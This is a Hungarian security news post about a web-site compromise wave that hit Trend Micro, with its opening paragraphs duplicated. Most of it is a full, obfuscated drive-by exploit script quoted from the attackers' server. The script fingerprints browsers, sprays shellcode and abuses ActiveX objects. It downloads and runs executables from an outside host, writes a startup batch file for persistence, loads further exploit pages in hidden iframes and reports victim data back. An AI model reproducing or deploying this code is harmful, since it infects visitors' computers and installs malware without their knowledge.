Egy napok óta zajló, több tízezer webhelyet érintő támadáshullám áldozata lett a Trend Micro. Úgy tűnik a biztonságtechnikával foglalkozó cégek sincsenek biztonságban... A támadók úgy tűnik, ASP technológiával készített portálokat támadnak, melyeken olyan kódokat helyeznek el, melyek több átirányításon keresztül próbálnak meg főként ismert ActiveX exploitokat futtatni, majd olyan kódokat installálni, melyek különböző online játékokban próbálják meg a támadók oldalára fordítani a "szerencsét".
A támadássorozat közvetlen előzménye egy főleg phpBB fórumokat célzó, 200.000 oldalt érintő tömeges SQL injectiont használó támadássorozat, melynek hatását az alábbi videó szemlélteti:
Nem lehet tudni, hogy a két támadási hullám összefügg-e egymással, mert bár időben rendkívül közel zajlottak le egymáshoz, de a módszerek és az exploitok által szállított "hasznos teher" is jelentősen eltérő volt.
Ha valakit érdekel, itt van a beszűrt JavaScript kódok egyik variánsa (thx Ph4nt0m):
A támadássorozat közvetlen előzménye egy főleg phpBB fórumokat célzó, 200.000 oldalt érintő tömeges SQL injectiont használó támadássorozat, melynek hatását az alábbi videó szemlélteti:
Nem lehet tudni, hogy a két támadási hullám összefügg-e egymással, mert bár időben rendkívül közel zajlottak le egymáshoz, de a módszerek és az exploitok által szállított "hasznos teher" is jelentősen eltérő volt.
Ha valakit érdekel, itt van a beszűrt JavaScript kódok egyik variánsa (thx Ph4nt0m):
http://b.njnk.net:80/E/J.JS <http://b.njnk.net/E/J.JS>
var z1IlbQFl0X = 0;
var z1IlaxFl0X = 0;
var z1IlbPFl0X = 1;
var z1IlbiFl0X = 0;
var z1IlbCFl0X = 0;
var z1IlbHFl0X = 0;
var z1IlbIFl0X = 0;
var z1IlbfFl0X = "use" + "rid1" + "AF9122";
var z1IlbcFl0X = "20";
var z1IlaoFl0X = "a.n" + "jnk." + "net";
var z1IlbGFl0X = 0, z1IlbzFl0X = 0, z1IlaHFl0X = 0;
var z1IlaAFl0X = "";
var z1IlanFl0X = 0;
var z1IlapFl0X = 0, z1IlaOFl0X = 0, z1IlaKFl0X = 0, z1IlaLFl0X = 0;
var z1IlamFl0X = "n" + "one";
var z1IlcqFl0X;
var z1IlaSFl0X = 0;
{
if(z1IlbQFl0X) {
document.getElementsByTagName("bod" + "y") [ 0] .innerHTML += z1IlcFFl0X + "<b" + "r>";
}
}
{
if(z1IlbQFl0X) {
alert(z1IlcFFl0X);
}
}
function x0r1aU2Z(name) {
var z1IlaFFl0X = document.cookie;
var z1IlaJFl0X = name + "=";
if(! z1IlaFFl0X) {
return null;
}
var z1IlaDFl0X = z1IlaFFl0X.indexOf("; " + z1IlaJFl0X);
if(z1IlaDFl0X == - 1) {
z1IlaDFl0X = z1IlaFFl0X.indexOf(z1IlaJFl0X);
if(z1IlaDFl0X != 0) {
return null;
}
}
else {
z1IlaDFl0X += 2;
}
var z1IlbqFl0X = document.cookie.indexOf(";", z1IlaDFl0X);
if(z1IlbqFl0X == - 1) {
z1IlbqFl0X = z1IlaFFl0X.length;
}
return unescape(z1IlaFFl0X.substring(z1IlaDFl0X + z1IlaJFl0X.length, z1IlbqFl0X));
};
function x0r1aR2Z(name, value) {
var exp = new Date();
var z1IlbVFl0X = exp.getTime() + (365 * 1 * 24 * 60 * 60 * 1000);
exp.setTime(z1IlbVFl0X);
var z1IlbYFl0X = name + "=" + escape(value) + "; e" + "xpires" + "=" + exp.toGMTString();
document.cookie = z1IlbYFl0X;
};
function x0r1ax2Z(z1IlakFl0X, z1IlalFl0X) {
while(z1IlakFl0X.length * 2 < z1IlalFl0X) {
z1IlakFl0X += z1IlakFl0X;
}
z1IlakFl0X = z1IlakFl0X.substring(0, z1IlalFl0X / 2);
return z1IlakFl0X;
};
function z1IltFl0X() {
if(z1IlaSFl0X > 0) {
return;
}
try {
var z1IlbaFl0X = 0 x0c0c0c0c;
%" + "u" + "ee83%ufe3" + "a%u06" + "4e綍謄菎ᣁ諨%u" + "ffff%u"
+ "83ff%u0" + "c" + "c1Ƹ敮" + "%uc17" + "4ࣸ桐%" + "u6977楮" + "%udc"
+ "8b剑s" + "%u0" + "4" + "55奚%" + "ud08b%u" + "68e8" + "㏿%" + "u"
+ "50c0偐%u50" + "50嗿褜㑅" + "쀳偐偐嶍區%u75f" + "fT⁕%u458" + "9" + "%u"
+ "eb38㍴%u66c" + "0%u6c" + "b8偬%u7" + "1" + "68%u2e" + "31%" + "u8"
+ "964" + "づ%u" + "c033" + "%" + "ub050%u50" + "82%u02b" + "0㉐僀끐셀"
+ "ᣠp" + "%u30" + "75嗿" + "茈￸%" + "ud3" + "74%" + "u4589㌼%u66c"
+ "0%u0cb" + "8%u2b0" + "1诠" + "%u8df" + "4ў晓Ҹ" + "倁䚍%u50" + "08%u75"
+ "ffX%u24" + "55%u" + "468b%u85" + "04%u" + "74c0㌖%u50" + "c0%u46"
+ "8d倄盿%u8d" + "0" + "4" + "ࡆ" + "p㱵嗿" + "￐㱵" + "%u55f" + "f㌐%uff0"
+ "fふ%u55" + "ff%u8" + "304ી%u" + "ff50ᡕ%" + "uf7eb%" + "uf3e" + "8%u"
+ "ff" + "f" + "e" + "棿瑴㩰⼯⹡%u6" + "a6e%u" + "6b6e渮%u7" + "465%"
+ "u632f%u69" + "67%" + "u622d湩樯%u2" + "f6c%u" + "6c6a%u6" + "16"
+ "f敤" + "%" + "u2e72" + "汰" + "%u6" + "c3f慯晤汩㵥%u2f7" + "1" + "%"
+ "u" + "3171搮汬%u" + "f" + "fff");*var z1IlarFl0X = unescape("%"
+ "ueb55㍮%" + "u64c" + "0䂋蔰%u78c" + "0%u" + "560d%" + "u408b%" + "u"
+ "8b0cᱰ%" + "u8badࡀ%uc3" + "5e䂋" + "茴糀䂋쌼%u8b6" + "0%u2" + "46c"
+ "謤㱅%u7c" + "8b%u" + "78" + "05ﴃ例%u" + "8b18%u" + "20" + "5f�㏣%u8b"
+ "49" + "謴%u" + "f50" + "3쀳%uf" + "c99%" + "u84ac%u74c" + "0섇්퀃"
+ "%" + "uf4eb%u543" + "b⠤%ue27" + "5%u5" + "f" + "8b" + "̤曝ಋ譋ᱟ%udd"
+ "03ҋ%u03" + "8b觅%u" + "2444%u61" + "1" + "c굒%u" + "52" + "50ꧨ"
+ "%" + "u" + "89" + "ff茇" + "ࣄ잃" + "㬄痱쏬于%" + "uec0" + "e"
+ "%u17a" + "5%u7c" + "0" + "1%u7" + "91f%u" + "97fb࿽ﹲᚳ䦰�" + "䐩埨縏䮋%u5f"
+ "e" + "3%" + "u835e%u7" + "cec" + "%u4ce" + "8%" + "uffff%u8b"
+ "ff%uebd" + "0%ue8" + "0" + "5%uf" + "ff9%" + "ueb58赦"
+ "䁽肤%uf" + "f7e%u7" + "5ff%u4f" + "f9%u17f" + "6" + "
var z1IlaCFl0X = 0 x400000;
var z1IlaWFl0X = z1IlarFl0X.length * 2;
var z1IlalFl0X = z1IlaCFl0X - (z1IlaWFl0X + 0 x38);
var z1IlakFl0X = unescape("邐%u9" + "090邐%u9" + "090邐邐%" + "u9090%u9" + "09" + "0");
z1IlakFl0X = x0r1ax2Z(z1IlakFl0X, z1IlalFl0X);
z1IlaZFl0X = (z1IlbaFl0X - 0 x400000) / z1IlaCFl0X;
z1IlbyFl0X = new Array();
for(i = 0; i < z1IlaZFl0X; i++ ) {
z1IlbyFl0X[ i] = z1IlakFl0X + z1IlarFl0X;
}
z1IlaSFl0X = 1;
}
catch(e) {}
};
function x0r1aW2Z(z1IlavFl0X, n) {
var z1IlbvFl0X = null;
try {
eval("z1IlbvFl0X = z1IlavFl0X" + ".C" + "reat" + "eObject(n" + ")")
}
catch(e) {}
if(! z1IlbvFl0X) {
try {
eval("z1IlbvF" + "l0X = z1Ilav" + "Fl0X." + "Cre" + "ateObject(n, \"\"" + ")")
}
catch(e) {}
}
if(! z1IlbvFl0X) {
try {
eval("z1I" + "lbv" + "Fl0X" + " = z1" + "IlavFl0X.CreateObj" + "ect(n, \"\"," + " \"\")")
}
catch(e) {}
}
if(! z1IlbvFl0X) {
try {
eval("z1IlbvFl" + "0X = " + "z1IlavFl0X.GetObj" + "ect(" + "\"" + "\", n)")
}
catch(e) {}
}
if(! z1IlbvFl0X) {
try {
eval("z1Ilbv" + "Fl0X = z" + "1IlavFl0X.G" + "etO" + "bject" + "(n, \"\")")
}
catch(e) {}
}
if(! z1IlbvFl0X) {
try {
eval("z1Ilbv" + "Fl0" + "X = z1Ila" + "v" + "Fl0X.GetObject(n)")
}
catch(e) {}
}
return(z1IlbvFl0X);
};
function x0r1aN2Z(xml, z1IlavFl0X, url, z1IlczFl0X) {
xml.open("GET", url, false);
xml.send(null);
var z1IlcGFl0X = xml.responseBody;
z1IlavFl0X.Type = 1;
z1IlavFl0X.Mode = 3;
z1IlavFl0X.Open();
z1IlavFl0X.Write(z1IlcGFl0X);
z1IlavFl0X.SaveToFile(z1IlczFl0X, 2);
z1IlavFl0X.Close();
};
function x0r1bd2Z(z1IlavFl0X, z1IlbZFl0X, z1IlcaFl0X) {
try {
z1IlavFl0X.Type = 2;
z1IlavFl0X.Mode = 3;
z1IlavFl0X.Charset = "Win" + "dows-" + "1251";
z1IlavFl0X.Open();
z1IlavFl0X.WriteText(z1IlbZFl0X);
z1IlavFl0X.SaveToFile(z1IlcaFl0X, 2);
z1IlavFl0X.Close();
}
catch(z1IlcKFl0X) {}
};
function z1IlEFl0X(a) {
var z1IlbmFl0X = "/cgi-b" + "in/" + "jl/jload" + "er.pl?load" + "file=q";
var z1IlaMFl0X = x0r1aW2Z(a, "m" + "sxml2.XM" + "LHTTP");
if(! z1IlaMFl0X) {
z1IlaMFl0X = x0r1aW2Z(a, "Microsoft" + ".XMLHTT" + "P");
}
var z1IlbbFl0X = x0r1aW2Z(a, "adodb" + ".st" + "ream");
var s = x0r1aW2Z(a, "WScript" + ".Shel" + "l");
var e = s.Environment("Proce" + "ss");
var z1IlckFl0X = "ht" + "tp://" + z1IlaoFl0X + z1IlbmFl0X + "/q" + "1.dll";
var z1IlcgFl0X = "http" + "://" + z1IlaoFl0X + z1IlbmFl0X + "/q" + "2l.jpg";
var z1IlcCFl0X = e.Item("TE" + "MP") + "\\q1.dl" + "l";
var z1IlclFl0X = e.Item("TEM" + "P") + "\\q2l." + "exe";
var z1IlcHFl0X = e.Item("PROGRAM" + "FIL" + "ES");
x0r1aN2Z(z1IlaMFl0X, z1IlbbFl0X, z1IlckFl0X, z1IlcCFl0X);
x0r1aN2Z(z1IlaMFl0X, z1IlbbFl0X, z1IlcgFl0X, z1IlclFl0X);
var z1IlbLFl0X = "\"" + z1IlclFl0X + "\"" + " \"" + z1IlcCFl0X + "\"" + "
\"" + z1IlcHFl0X + "\\I" + "nternet Exp" + "lorer\\ie" + "xp" + "lore.exe\"";
x0r1bd2Z(z1IlbbFl0X, "@ech" + "o" + " off\n" + z1IlbLFl0X + "\n",
e.Item("USERP" + "RO" + "FILE") + "\\Start M" + "enu\\Pr" + "og" +
"rams\\Startup\\sta" + "rtu" + "p.bat");
try {
s.run(z1IlbLFl0X);
return true;
}
catch(e) {}
return false;
};
function x0r1aH2Z() {
if(navigator.userAgent.indexOf("Oper" + "a") == - 1 && navigator.userAgent.indexOf("Firefo" + "x") == - 1 && navigator.userAgent.indexOf("M" + "SIE") != - 1 && navigator.userAgent.indexOf("W" + "indows") != - 1) {
z1IlaOFl0X = x0r1aQ2Z();
z1IlapFl0X = x0r1aI2Z();
return "ie";
}
if(navigator.userAgent.indexOf("Firefo" + "x") != - 1) {
return "firefo" + "x";
}
if(navigator.userAgent.indexOf("O" + "pera") != - 1) {
return "oper" + "a";
}
return "unkno" + "wn";
};
function x0r1an2Z() {
z1IlatFl0X = document.createElement("DIV");
z1IlatFl0X.id = "z1I" + "latF" + "l0X";
z1IlatFl0X.addBehavior("#" + "default#cli" + "entCaps");
document.body.appendChild(z1IlatFl0X);
};
function z1IlIFl0X() {
var version = 0, qt_control;
if(z1IlaAFl0X == "ie") {
try {
qt_control = new ActiveXObject('QuickTime.QuickTime');
}
catch(e) {
return 0;
}
delete qt_control;
if(z1IlapFl0X < 700) {
try {
var qt_check = new ActiveXObject('QuickTimeCheckObject.QuickTimeCheck');
version = (qt_check.z1IlblFl0X & 0 xffff0000) >> 16;
delete qt_check;
}
catch(e) {}
}
else {
version = 0 x100;
}
}
else {
if(navigator.plugins != null && navigator.plugins.length > 0) {
var plugin_str = null;
for(var i = 0; i < navigator.plugins.length; i++ ) {
var z1IlaPFl0X = navigator.plugins[ i];
if(z1IlaPFl0X.name.indexOf("QuickTim" + "e") > - 1) {
plugin_str = z1IlaPFl0X.name;
}
}
var z1IlcDFl0X = /[\d.]+/ g;
var z1IlceFl0X = z1IlcDFl0X.exec(plugin_str);
var z1IlaFl0X = z1IlceFl0X[ 0] .split(".");
version = (parseInt(z1IlaFl0X[ 0] ) << 8) + (parseInt(z1IlaFl0X[ 1] ) << 4);
if(z1IlaFl0X.length > 2) {
version += parseInt(z1IlaFl0X[ 2] );
}
}
}
return version;
};
function x0r1aQ2Z() {
var z1IlbdFl0X, z1IlaRFl0X;
var z1IlaBFl0X;
try {
x0r1an2Z();
z1IlaRFl0X = z1IlatFl0X.getComponentVersion("{89820" + "200-" +
"ECBD-11CF" + "-8" + "B85-00AA005B4383}", "compo" + "nent" + "id");
z1IlbdFl0X = z1IlaRFl0X.split(",");
z1IlbsFl0X = parseInt(z1IlbdFl0X[ 0] ) * 10000000000 +
parseInt(z1IlbdFl0X[ 1] ) * 100000000 + parseInt(z1IlbdFl0X[ 2] ) * 10000 + parseInt(z1IlbdFl0X[ 3] );
}
catch(e) {
z1IlbsFl0X = 0;
}
return z1IlbsFl0X;
};
function x0r1aI2Z() {
var z1IlbdFl0X, z1IlaRFl0X;
var z1IlaBFl0X = 0;
try {
if(! z1IlatFl0X) {
x0r1an2Z();
}
z1IlaRFl0X = z1IlatFl0X.getComponentVersion("{898202" + "00-ECBD-11CF-8B85-00" + "AA" + "005B4383" + "}", "c" + "ompon" + "entid");
z1IlbdFl0X = z1IlaRFl0X.split(",");
z1IlaBFl0X = parseInt(z1IlbdFl0X[ 0] ) * 100 + parseInt(z1IlbdFl0X[ 1] );
}
catch(e) {
var z1IlcDFl0X = /MSIE\s+(\d+)\.(\d+)/;
var z1IlbjFl0X = new Array;
if(z1IlbjFl0X = z1IlcDFl0X.exec(navigator.userAgent)) {
z1IlaBFl0X = parseInt(z1IlbjFl0X[ 1] ) * 100 + parseInt(z1IlbjFl0X[ 2] );
}
}
return z1IlaBFl0X;
};
function x0r1aD2Z() {
var z1IlasFl0X, z1IlbdFl0X;
var z1IlbrFl0X = "", z1IlaBFl0X = 0;
z1IlbXFl0X = /\sFirefox\/([\d\.]+)\b/;
z1IlasFl0X = z1IlbXFl0X.exec(navigator.userAgent);
if(! z1IlasFl0X) {
return 0;
}
z1IlbdFl0X = z1IlasFl0X[ 1] .split(".");
z1IlaBFl0X = (parseInt(z1IlbdFl0X[ 0] ) * 1000000) + (parseInt(z1IlbdFl0X[ 1] ) * 10000);
if(z1IlbdFl0X.length > 2) {
z1IlaBFl0X += parseInt(z1IlbdFl0X[ 2] ) * 100;
}
if(z1IlbdFl0X.length > 3) {
z1IlaBFl0X += parseInt(z1IlbdFl0X[ 3] );
}
return z1IlaBFl0X;
};
function x0r1aJ2Z() {
var z1IlasFl0X;
var z1IlbnFl0X = 0;
z1IlbXFl0X = /Windows\sNT\s(\d)\.(\d)/;
z1IlasFl0X = z1IlbXFl0X.exec(navigator.userAgent);
if(! z1IlasFl0X) {
z1IlbXFl0X = /Windows\s98/;
z1IlasFl0X = z1IlbXFl0X.exec(navigator.userAgent);
if(z1IlasFl0X) {
z1IlbnFl0X = 48;
return z1IlbnFl0X;
}
return 0;
}
z1IlbnFl0X = parseInt(z1IlasFl0X[ 1] ) * 10 + parseInt(z1IlasFl0X[ 2] );
return z1IlbnFl0X;
};
function x0r1aE2Z(z1IlbOFl0X) {
var z1IlcIFl0X = document.getElementById("z1" + "IlbeFl" + "0X");
z1IlcIFl0X.src = z1IlbOFl0X;
return true;
};
function x0r1au2Z(z1IlbRFl0X) {
var iframe = document.getElementById("z1Il" + "aE" + "Fl0X");
iframe.src = z1IlbRFl0X;
return true;
};
function x0r1av2Z() {
if(z1IlaxFl0X) {
return true;
}
x0r1aE2Z("http" + "://" + z1IlaoFl0X + "/E/isci/isc" + "i_my" + ".js");
};
function x0r1aT2Z() {
if(z1IlaxFl0X) {
return true;
}
x0r1au2Z("http:" + "//" + z1IlaoFl0X + "/E/ff1" + "04/" + "ff104.htm");
};
function x0r1aS2Z() {
if(z1IlaxFl0X) {
return true;
}
x0r1au2Z("http:" + "//" + z1IlaoFl0X + "/E/ff15" + "4/ff154" + ".htm");
};
function x0r1aB2Z() {
if(z1IlbIFl0X > 0) {
return false;
}
if(z1IlaxFl0X) {
return true;
}
z1IltFl0X();
x0r1au2Z("http:" + "//" + z1IlaoFl0X + "/E/vm" + "l/vml" + ".htm");
};
function x0r1aG2Z() {
if(z1IlbHFl0X > 0) {
return false;
}
if(z1IlaxFl0X) {
return true;
}
z1IltFl0X();
x0r1au2Z("http:" + "//" + z1IlaoFl0X + "/E" + "/" + "ani/ani5.htm");
};
function x0r1az2Z() {
var z1IlbEFl0X = 0;
var z1IlctFl0X = false;
if(z1IlbiFl0X > 0) {
return false;
}
if(z1IlaxFl0X) {
return true;
}
var z1IlbpFl0X = new Array("{BD" + "9" + "6" +
"C556-65A3-11D0-983A-00C04FC2" + "9E30}", "{A" + "B9BCEDD-EC" +
"7E-47E1-9322-D4A210617" + "116" + "}", "{00" + "06F033-" + "0000-0000-C0" +
"00" + "-000000000046}", "{0006F03A-" + "00" + "00-000" + "0-C000-000" +
"000000046}", "{6" + "e" + "32070a-766d-4" + "ee6-879c-dc1fa" + "91d2fc3}",
"{6414512B-B978-" + "45" + "1D-A0D8-FCF" + "DF33E" + "833C}", "{7F5B7F63-F0" +
"6F-4" + "33" + "1-8A26-" + "339E03C0AE3D}", "{06723E09-F4" + "C2-" +
"43c8-8358-09FCD1" + "DB" + "0766}", "{639F725F-1" + "B2D-4831-A9" + "FD-874" +
"84768" + "2010}", "{BA" + "0185" + "99-1" + "DB3-44f9-83" + "B4-461454C84BF8}", "{D0C07D56-7C69-43" + "F1" + "-B4A0-25F5A11F" + "AB1" +
"9}", "{E8CCCDDF-CA2" + "8-" + "496" + "b-B050-" + "6C07C962476B}", "{BD96C5" +
"56-6" + "5A3-11D" + "0-9" + "83A-00C04FC29E36}", null);
while(z1IlbpFl0X[ z1IlbEFl0X] ) {
var z1IlbFFl0X = null;
z1IlbFFl0X = document.createElement("objec" + "t");
z1IlbFFl0X.setAttribute("clas" + "sid", "clsi" + "d:"
+ z1IlbpFl0X[ z1IlbEFl0X] .substring(1, z1IlbpFl0X[ z1IlbEFl0X] .length - 1));
if(z1IlbFFl0X) {
try {
var z1IlcvFl0X = x0r1aW2Z(z1IlbFFl0X, "S" + "hell." + "Application");
if(z1IlcvFl0X) {
z1IlctFl0X = z1IlEFl0X(z1IlbFFl0X);
return z1IlctFl0X;
}
}
catch(e) {}
}
z1IlbEFl0X++;
}
return false;
};
function z1IlNFl0X() {
if(z1IlbCFl0X > 0) {
return false;
}
if(z1IlaxFl0X) {
return true;
}
if(z1IlaKFl0X == 0) {
return false;
}
if(z1IlaKFl0X > 0 x730) {
return false;
}
z1IltFl0X();
if(z1IlaAFl0X == "ie") {
document.getElementById("tmp_d" + "iv1").innerHTML = "<object "
+ "CL" + "ASS" + "ID" + "=\"clsid:02BF25D" + "5-8" + "C17-4B23"
+ "-BC80-D" + "3488ABD" + "DC6B\" widt" + "h=\"0\" height=" + "\"0\" "
+ "s" + "tyle=\"border:0px\"><par" + "am name=\"src\"" + " value=\"http://"
+ z1IlaoFl0X + "/E/pl.mo" + "v\">" + "<param na" + "me" + "=\"autopla"
+ "y\" value=\"" + "true\"><param n" + "ame=\"l" + "oop\" v"
+ "alue=\"false\"" + "><param" + " name=\"controller\" v" + "alue="
+ "\"t" + "rue\"></obj" + "ect>";
}
else {
document.getElementById("tmp_di" + "v1").innerHTML = "<embed "
+ "s" + "rc=\"ht" + "tp://" + z1IlaoFl0X + "/E/pl.mov\" wi"
+ "dth=\"1\" hei" + "ght=\"1\" " + "l" + "oop=\"" + "f" + "alse\" "
+ "autopl" + "ay=\"true\">";
}
return true;
};
function z1IlaiFl0X() {
for(var i = 0; i < 100000; i++ ) {
var n = i;
}
};
function x0r1X2Z() {
if(z1IlNFl0X()) {
if(z1IlaAFl0X == "ie") {
if(! z1IlaLFl0X) {
setTimeout("x0r1" + "aG2Z(" + ");", 2000);
setTimeout("x0r1aB2" + "Z(" + ");", 4000);
}
else {
setTimeout("x" + "0r1" + "aB2Z();", 2000);
x0r1aB2Z();
}
}
return;
}
if(z1IlaAFl0X == "ie") {
if(z1IlanFl0X == 48 || z1IlapFl0X < 600) {
x0r1aB2Z();
return;
}
if(! z1IlaLFl0X) {
x0r1aG2Z();
setTimeout("x0r1a" + "B2Z()" + ";", 4000);
}
else {
x0r1aB2Z();
}
}
};
function x0r1aC2Z() {
url = "htt" + "p://" + z1IlaoFl0X + "/cgi-bin/" + "jl/jloa" + "der"
+ ".pl?" + "source=" + location.hostname + "&syste" + "m_i" + "d="
+ z1IlamFl0X + "&qtver=0" + "x" + z1IlaKFl0X.toString(16);
if(z1IlaAFl0X == "ie") {
url = url + "&iebuild" + "=" + z1IlaOFl0X + "&av_id" + "=" + z1IlaLFl0X;
}
try {
var z1IlcJFl0X = document.getElementById("serv" + "_note_l" + "ink");
z1IlcJFl0X.src = url;
}
catch(e) {};
};
z1IlbSFl0X = [ "NA" + "VCfgWizDll.N" + "AVCfg" + "WizMgr", "McGD" + "Mgr.DwnldGroup" + "Mg" + "r"];
z1IlbTFl0X = [ "48F45200-91E6-11CE-8A4F-0" + "0" + "8" + "0C81A28D" + "4",
"091EB208-39DD-417D-" + "A5D" + "D-7" + "E2C2" + "D8FB9CB", "D653647D-" +
"D607-4" + "DF6-A5B8-4" + "8D2BA" + "195F7B", "9F97547E-4" + "609-" + "4" +
"2C5-AE0C-81C61F" + "FAEBC3", "65756541-C6" + "5C-11C" + "D-0000-4B656E69" +
"61" + "00", "1474F601-" + "9B4B-" + "4EB0-81F" + "A-20F753" + "C0E1A4", "D5" +
"5" + "0702" + "0-DB45-1" + "1d1-A5F0-00600872F78D", "D" + "D2" +
"30880-495A-11D1-B064-0" + "08048" + "EC2FC5", "B089FE88-FB5" + "2" +
"-11D3-BDF1-005" + "0DA3415" + "0D", "472083B0-C5" + "22-11CF-8" + "7" +
"63-00608CC02F2" + "4", "45AC2688" + "-0253-4" + "ED8-97" + "DE-B" +
"5370FA7D48A", "893" + "4FCEF-F5B8-468" + "F-9" + "51" + "F-78A921CD3920",
"1EB2409C" + "-6E28-" + "4066-9738-9" + "7A1B8F5" + "639C", "E75" +
"93602-124B-" + "47" + "C9-9F" + "73-A69308EDC973", "B43CB0C0-84F2-1" + "1D6-A"
+ "18E-00C0DF0" + "43" + "BA4"];
function x0r1aK2Z(i) {
z1IlbGFl0X++;
z1IlbTFl0X[ i] = null;
};
function x0r1aF2Z(i) {
z1IlbzFl0X++;
if(z1IlaHFl0X) {
return;
}
if(z1IlbTFl0X[ i] != null) {
z1IlaLFl0X = z1IlbSFl0X.length + i + 1;
z1IlaHFl0X = 1;
}
};
function x0r1aM2Z() {
var z1IlcsFl0X = "";
try {
var z1IlcuFl0X = 0;
for(i = 0; i < z1IlbSFl0X.length && ! z1IlaLFl0X; i++ ) {
try {
new ActiveXObject(z1IlbSFl0X[ i] );
z1IlaLFl0X = i + 1;
z1IlaHFl0X = 1;
}
catch(e) {};
}
if(z1IlaLFl0X) {
return 1;
}
for(i = 0; i < z1IlbTFl0X.length; i++ ) {
z1IlcsFl0X += "<o" + "bjec" + "t classid=" + "'clsid:" +
z1IlbTFl0X[ i] + "'" + " o" + "nerror='x0" + "r1aK2Z(" + i + ")' onreadystatecha" + "nge='" + "x0" + "r1aF2Z" + "(" + i + ")" + "'><"
+ "/objec" + "t>";
}
document.createElement("div").innerHTML = z1IlcsFl0X;
}
catch(e) {};
if(z1IlaLFl0X) {
return 1;
}
return 0;
};
function x0r1aP2Z() {
for(var i = 0; i < 10000; i++ ) {
var n = i;
}
if(! z1IlbQFl0X && z1IlbPFl0X) {
try {
if(x0r1aU2Z(z1IlbfFl0X) == z1IlbcFl0X) {
return false;
}
}
catch(e) {};
}
z1IlanFl0X = x0r1aJ2Z();
z1IlaAFl0X = x0r1aH2Z();
z1IlaKFl0X = z1IlIFl0X();
var tmp_div = document.createElement("DIV");
tmp_div.id = "tmp_di" + "v1";
document.body.appendChild(tmp_div);
var z1IlazFl0X = document.createElement("IFRAM" + "E");
z1IlazFl0X.id = "serv_" + "note" + "_link";
z1IlazFl0X.border = 0;
z1IlazFl0X.frameborder = 0;
z1IlazFl0X.width = 0;
z1IlazFl0X.height = 0;
document.body.appendChild(z1IlazFl0X);
var z1IlaEFl0X = document.createElement("IFRA" + "ME");
z1IlaEFl0X.id = "z" + "1I" + "laEFl0X";
z1IlaEFl0X.border = 0;
z1IlaEFl0X.frameborder = 0;
z1IlaEFl0X.width = 0;
z1IlaEFl0X.height = 0;
document.body.appendChild(z1IlaEFl0X);
var z1IlbeFl0X = document.createElement("SCRIP" + "T");
z1IlbeFl0X.id = "z1Il" + "beF" + "l0X";
document.body.appendChild(z1IlbeFl0X);
if(z1IlaAFl0X == "ie" && z1IlanFl0X != 0) {
if(z1IlapFl0X >= 700 && z1IlapFl0X < 800) {
if(z1IlanFl0X < 60) {
z1IlamFl0X = "i" + "e7_xp";
}
else {
z1IlamFl0X = "ie7_" + "vista";
}
}
else if(z1IlapFl0X >= 600 && z1IlapFl0X < 700) {
if(z1IlanFl0X == 50) {
z1IlamFl0X = "ie6_2" + "k";
}
else if(z1IlanFl0X == 51) {
if(z1IlaOFl0X >= 60029002180) {
z1IlamFl0X = "ie" + "6_xpsp2";
}
else if(z1IlaOFl0X >= 60028001106) {
z1IlamFl0X = "ie" + "6_xpsp1";
}
else if(z1IlaOFl0X == 60026000000) {
z1IlamFl0X = "ie6" + "_xpsp0";
}
else {
z1IlamFl0X = "ie" + "6_xp";
}
}
else if(z1IlanFl0X == 48) {
z1IlamFl0X = "ie6_w" + "in98";
}
else {
z1IlamFl0X = "ie6_" + "u" + "nknown";
}
}
else if(z1IlapFl0X >= 500 && z1IlapFl0X < 600) {
if(z1IlanFl0X == 50) {
z1IlamFl0X = "ie" + "5_2k";
}
else if(z1IlanFl0X < 50) {
z1IlamFl0X = "i" + "e5_nt";
}
}
else {
z1IlamFl0X = "ie_unkn" + "o" + "wn";
}
if(z1IlapFl0X < 700) {
x0r1aM2Z();
}
else {
z1IlaLFl0X = - 1;
}
}
if(z1IlaAFl0X == "fir" + "efox" && z1IlanFl0X != 0) {
var z1IlawFl0X = 0;
z1IlawFl0X = x0r1aD2Z();
if(z1IlawFl0X <= 1000400) {
z1IlamFl0X = "ff" + "104";
}
if(z1IlawFl0X > 1000400 && z1IlawFl0X <= 1050004) {
z1IlamFl0X = "ff" + "150";
}
z1IlamFl0X = "ff";
}
x0r1aV2Z();
};
function x0r1ay2Z(z1IlcdFl0X) {
window.status = z1IlcdFl0X;
};
function x0r1aV2Z() {
z1IlaHFl0X = 1;
x0r1aC2Z();
x0r1ay2Z("Openin" + "g " + window.location.href + "...");
setTimeout("x" + "0r1ay2Z('Done'" + ")", 30000);
try {
x0r1aR2Z(z1IlbfFl0X, z1IlbcFl0X);
}
catch(e) {};
var z1IlbgFl0X = false;
switch(z1IlamFl0X) {
case "ie7_x" + "p" : z1IlNFl0X();
break;
case "ie6_" + "xpsp0" : case "ie6" + "_2k" : case "ie6_xpsp" + "1" :
case "ie6_xp" + "sp2" : case "ie" + "6_xp" : case "ie6_un" + "know" + "n" :
case "i" + "e6_win98" : case "ie5_" + "2k" : case "ie5" + "_nt" :
case "ie5_unkno" + "w" + "n" : case "i" + "e_unk" + "nown" : try {
z1IlbgFl0X = x0r1az2Z();
}
catch(e) {}
if(! z1IlbgFl0X) {
x0r1X2Z();
}
break;
case "ff" + "104" : x0r1aT2Z();
break;
case "ff1" + "50" : x0r1aS2Z();
break;
case "ff" : z1IlNFl0X();
default : break;
}
};
if(document.addEventListener) {
document.addEventListener("DOMC" + "ontentLoade" + "d", x0r1aP2Z, false);
}
else {
document.write("<scr" + "ipt id=__ie_onload defe" + "r" + " src=javascr" + "ipt:v" + "o" + "id(0)><\/scri" + "pt>");
var script = document.getElementById("__ie" + "_onlo" + "ad");
script.onreadystatechange = function() {
if(this.readyState == "c" + "omplete") {
x0r1aP2Z();
}
};
}
